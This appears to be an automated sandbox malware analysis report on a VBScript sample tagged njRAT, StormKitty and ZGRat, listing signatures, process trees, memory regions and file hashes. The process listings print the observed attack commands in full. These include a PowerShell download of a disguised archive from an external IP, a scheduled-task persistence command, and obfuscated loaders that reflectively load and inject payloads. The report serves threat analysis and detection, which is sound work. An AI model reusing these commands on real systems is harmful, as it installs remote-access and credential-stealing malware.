Malware Analysis Report

2024-10-18 21:24

Sample ID 240320-xsghmshc31
Target xt.vbs
SHA256 45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b
Tags
njrat stormkitty zgrat hacked by ms47 rat stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b

Threat Level: Known bad

The file xt.vbs was found to be: Known bad.

Malicious Activity Summary

njrat stormkitty zgrat hacked by ms47 rat stealer trojan

StormKitty

ZGRat

StormKitty payload

njRAT/Bladabindi

Detect ZGRat V1

Downloads MZ/PE file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-20 19:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-20 19:06

Reported

2024-03-20 19:14

Platform

win7-20240221-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-20 19:06

Reported

2024-03-20 19:18

Platform

win10v2004-20240226-en

Max time kernel

600s

Max time network

594s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

njRAT/Bladabindi

trojan njrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 508 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 508 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 4652 wrote to memory of 2456 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2456 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2456 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 2616 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4772 wrote to memory of 5060 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4772 wrote to memory of 3136 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 2616 wrote to memory of 3356 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 3356 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 2308 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 5060 wrote to memory of 1584 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1660 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 2056 wrote to memory of 880 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 880 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3644 wrote to memory of 2768 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 2768 wrote to memory of 1060 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1452 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1452 wrote to memory of 2320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\open.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\get.js

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\get.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

Network


Files

memory/2388-5-0x0000015D511B0000-0x0000015D511D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31ocissr.o4q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2388-10-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/2388-11-0x0000015D50880000-0x0000015D50890000-memory.dmp

memory/2388-12-0x0000015D512E0000-0x0000015D51306000-memory.dmp

memory/2388-13-0x0000015D51310000-0x0000015D51324000-memory.dmp

memory/2388-14-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/2388-15-0x0000015D50880000-0x0000015D50890000-memory.dmp

memory/2388-16-0x0000015D50880000-0x0000015D50890000-memory.dmp

memory/2388-17-0x0000015D51370000-0x0000015D51382000-memory.dmp

memory/2388-18-0x0000015D50870000-0x0000015D5087A000-memory.dmp

C:\Users\Public\node_modules\async\reduce.js

MD5 724bb52915e1158b4dff6f26ef4baf72
SHA1 ad0aa6a0ac5576433051167524923e6aa794c96a
SHA256 f1e4594194164d2504946c85c8e983346b25f9be8239178defec27e912b56c21
SHA512 657c3dec82c5c6c34accdbc9d96e2be59a592e60241960810f10a662f5305c21dcef8cf006fcdefb0d48d30ccdd30d9dd6c263c089a88591f18a83a2f390eaaa

C:\Users\Public\node_modules\lodash\fp\property.js

MD5 ebb08110bff348df334274bd1d79e025
SHA1 563c5eb1769785a3350bfd1cb2b4e090a650c994
SHA256 af3533640c8af8f6804e9df53cabeac7767cddf1a619236e7226a784a2e9101a
SHA512 5f613471f700f4d36a3847f694774f9db9b7ebafd5037c00268af6edbf762bdad13a713dda2f93ab5f02bb01e8cdde2d6919f33a1bd1d74899bf1bf130b3fc73

C:\Users\Public\node_modules\lodash\valueOf.js

MD5 3b889e721c9c14f7a5cd312bb476f2a6
SHA1 dcaa02fb24d8915128f62a50e2782e30d7d4fe8e
SHA256 469f0f647beaf4eeca8d316133bcd0a0b3f5e55a4c1a391da1f10baba824ca9d
SHA512 3590cd3433b362223d3256d29a851a056c09d0fc0f4414d194cf39b64d166841dffd59f3029c352991682e9ee8e06fc97855fa1cefeb209098428dc5c2c7f953

C:\Users\Public\node_modules\zip-stream\LICENSE

MD5 51478cb9e7ab40d3d3616c3794ded96b
SHA1 97caa58bbe0c8dcd3bd857dca51ab034344a71c1
SHA256 79bad9f51738814f83251ae89460326b2ff2ea19ff5f71ab8f7636b2e17bb231
SHA512 e0eb64b4b3e53390e54487234f5dd7555e9a5871e9d1e901f5c0bdf8d9670b220731d2bf58c80e57a6e28e93fc7574ece6b4d449a13c51c05619bfa0bf2774e3

memory/2388-3007-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

C:\Users\Public\basta.js

MD5 38affda935585ad2ddc0abe0a906f404
SHA1 8379070ec3e9b448499c53c6244c815bc566cf59
